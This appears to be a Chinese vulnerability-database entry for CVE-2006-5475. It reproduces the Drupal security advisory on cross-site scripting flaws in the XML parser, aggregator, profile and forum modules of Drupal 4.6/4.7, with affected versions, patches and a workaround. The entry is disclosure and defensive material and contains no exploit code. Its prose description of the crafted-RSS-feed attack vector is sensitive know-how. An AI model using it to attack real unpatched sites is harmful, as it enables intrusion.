Drupal XML解析器多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193093 漏洞类型 跨站脚本
发布时间 2006-10-24 更新时间 2006-10-24
CVE编号 CVE-2006-5475 CNNVD-ID CNNVD-200610-389
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/83650
https://cxsecurity.com/issue/WLB-2006100128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-389
|漏洞详情
Drupal中存在多个跨站脚本攻击漏洞,远程攻击者可以通过精心编制的RSS源来注入任意Web脚本或HTML。
|漏洞EXP
------------------------------------------------------------------------
----
Drupal security advisory                                  DRUPAL-SA-2006-024
------------------------------------------------------------------------
----
Project:          Drupal core
Date:             2006-Oct-18
Security risk:    Moderately critical
Exploitable from: Remote
Vulnerability:    Cross site scripting
------------------------------------------------------------------------
----
 
Description
-----------
Multiple XSS (cross site scripting) vulnerabilities have been discovered.

A bug in input validation and lack of output validation allows HTML and script 
insertion on several pages.

Drupal's XML parser passes unescaped data to watchdog under certain 
circumstances. A malicious user may execute an XSS attack via a specially 
crafted RSS feed. This vulnerability exists on systems that do not use PHP's 
mb_string extension (to check if mb_string is being used, navigate to 
admin/settings and look under "String handling"). Disabling the aggregator 
module provides an immediate workaround.

The aggregator module, profile module, and forum module do not properly escape 
output of certain fields.

Note: XSS attacks may lead to administrator access if certain conditions are 
met.
 
 
Versions affected
-----------------
- Drupal 4.6.x versions before Drupal 4.6.10
- Drupal 4.7.x versions before Drupal 4.7.4

Solution
--------
- If you are running Drupal 4.6.x then upgrade to Drupal 4.6.10.
   http://ftp.osuosl.org/pub/drupal/files/projects/drupal-4.6.10.tar.gz
- If you are running Drupal 4.7.x then upgrade to Drupal 4.7.4.
   http://ftp.osuosl.org/pub/drupal/files/projects/drupal-4.7.4.tar.gz

- To patch Drupal 4.6.9 use http://drupal.org/files/sa-2006-024/4.6.9.patch.
- To patch Drupal 4.7.3 use http://drupal.org/files/sa-2006-024/4.7.3.patch.

Please note that the patches only contain changes related to this advisory, and 
do not fix bugs that were solved in 4.6.10 or 4.7.4.

Reported by
-----------
- The XML parser vulnerability was reported by Erdem Kse.
- The forum module vulnerability was reported by Jim Phlew.
- The other vulnerabilities were found by members of the Drupal security team.

Contact
-------
The security contact for Drupal can be reached at security at drupal.org or 
using the form at http://drupal.org/contact.

// Uwe Hermann, on behalf of the Drupal Security Team.
-- 
Uwe Hermann 
http://www.hermann-uwe.de
http://www.it-services-uh.de  | http://www.crazy-hacks.org 
http://www.holsham-traders.de | http://www.unmaintained-free-software.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFN7DxXdVoV3jWIbQRAm5IAJ0UmC80/DpS0I2WM8q9nPmxZdjtHQCeMiVP
jFhf+0xpVQz/7pXwh71hOAo=
=5y6Z
-----END PGP SIGNATURE-----
|受影响的产品
Drupal Drupal 4.7.3 Drupal Drupal 4.7.2 Drupal Drupal 4.7.1 Drupal Drupal 4.7 Drupal Drupal 4.6.9 Drupal Drupal 4.6.8 Drupal Drupal 4.6.7
|参考资料

来源:VUPEN
名称:ADV-2006-4120
链接:http://www.frsirt.com/english/advisories/2006/4120
来源:SECUNIA
名称:22486
链接:http://secunia.com/advisories/22486
来源:BUGTRAQ
名称:20061019[DRUPAL-SA-2006-024]Drupal4.6.10/4.7.4fixesmultipleXSSissues
链接:http://www.securityfocus.com/archive/1/archive/1/449197/100/0/threaded
来源:OPENPKG
名称:OpenPKG-SA-2006.025-drupal
链接:http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.025-drupal.html
来源:drupal.org
链接:http://drupal.org/node/88826
来源:OSVDB
名称:29922
链接:http://www.osvdb.org/29922
来源:SREASON
名称:1766
链接:http://securityreason.com/securityalert/1766